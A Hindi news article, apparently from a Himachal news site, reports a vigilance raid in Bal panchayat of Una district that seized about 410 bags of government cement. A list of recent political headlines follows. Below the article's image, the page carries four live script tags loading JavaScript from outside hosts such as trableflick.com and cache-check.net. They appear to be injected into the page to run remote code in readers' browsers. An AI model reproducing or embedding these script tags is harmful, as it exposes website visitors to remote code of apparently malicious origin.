Categories: हिमाचल

ऊनाः गुप्त सूचना के आधार पर बल्ह पंचायत में सरकारी सीमेंट को लेकर विजिलेंस का छापा

<p>जिला ऊना में विजिलेंस की टीम ने सरकारी सीमेंट के दुरपयोग के संबंध में विकास खंड बंगाणा की बल्ह पंचायत में दबिश दी है। बुधवार शाम 8:00 बजे विजिलेंस की एक टीम ने बल्ह पंचायत में सरकारी सीमेंट को लेकर छापेमारी की। छापेमारी के दौरान पाया गया कि पंचायत&nbsp; के स्टाफ ने अलग-अलग जगह पर सरकारी सीमेंट के करीब 410 बैग जमा किए थे। गुप्त सूचना के आधार पर विजिलेंस द्वारा की गई इस छापेमारी में पंचायत का स्टाफ सीमेंट के संबंध में स्पष्ट जानकारी नहीं दे पाया है।</p>

<p>बताया जा रहा है कि यह सीमेंट पंचायतों में किए जा चुके विकास कार्यों में से बचाकर रखा हो सकता है। विकास खंड बंगाणा की पंचायतों में एक के बाद एक भ्रष्टाचार के मामले उजागर होने से ग्रामीणों का पंचायती राज संस्था से भरोसा उठ गया है। बीते 1 माह के दौरान विकास खंड बंगाणा&nbsp; की 1 दर्जन से अधिक पंचायतों में भ्रष्टाचार के कई मामले उजागर हो चुके हैं लेकिन बड़ी हैरत की बात है कि अभी तक भ्रष्टाचार में संलिप्त पंचायतों के खिलाफ कोई कानूनी कार्रवाई अमल में नहीं लाई गई है।</p>

<p>विजिलेंस की टीम द्वारा बल्ह पंचायत में की गई छापेमारी के दौरान पंचायत प्रतिनिधि व पंचायत का अन्य स्टाफ सीमेंट के एकत्रित किए गए 410 बैग के संबंध में कोई संतोषजनक जवाब नहीं दे पाए हैं। विजिलेंस की टीम ने जांच होने तक सीमेंट के बैग को अपने कब्जे में लेकर जांच आरंभ कर दी है। इस संबंध में विजिलेंस टीम के एसपी सागर चंद्र का कहना है की क्षेत्र की बल्ह पंचायत में गुप्त सूचना के आधार पर 400 के करीब सीमेंट के बैग बरामद किए गए हैं। इस सीमेंट की गंभीरता से जांच की जा रही है। जांच के बाद ही कुछ कहना सही होगा।</p>

<p><img src=”/media/gallery/images/image(1163).png” style=”height:600px; width:358px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1599792674907″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

जनता पेयजल को तरसती रही, राजेंद्र राणा सरकार गिराने की साजिश रचते रहे

-मुख्यमंत्री सुखविंदर सुक्खू ने राणा की गृह पंचायत की पेयजल समस्या सुलझाई -कैप्टन रणजीत सिंह…

4 hours ago

सुजानपुर में भाजपा को कुनबा संभालना हो रहा मुश्किल

मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू की नीतियों में आस्था जता रहे भाजपाई  मतदान की तारीख…

4 hours ago

मुख्य निर्वाचन अधिकारी ने राज्य नोडल अधिकारियों के साथ की मीटिंग

मुख्य निर्वाचन अधिकारी, मनीष गर्ग ने आज यहां सभी राज्य नोडल अधिकारियों को चुनाव व्यय…

4 hours ago

संसदीय क्षेत्रों में 3 और विस उप-चुनावों के लिए 4 नामांकनों की वापसी

निर्वाचन विभाग के एक प्रवक्ता ने आज यहां जानकारी दी कि आगामी लोकसभा तथा विधानसभा…

5 hours ago

मुल्थान जैसे घटनाएं रोकने को गंभीर प्रयास करे प्रदेश सरकार, जांच हो: आनंद शर्मा

धर्मशाला(कांगड़ा), 17 मई: जिला कांगड़ा के दुर्गम क्षेत्र मुल्थान में एक पनबिजली परियोजना की टनल…

20 hours ago

जनसेवा नहीं, धन सेवा के लिए राजनीति कर रहे राजेंद्र राणा: मुख्यमंत्री

सुजानपुर: मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू ने कहा कि सुजानपुर के पूर्व विधायक राजेंद्र राणा…

20 hours ago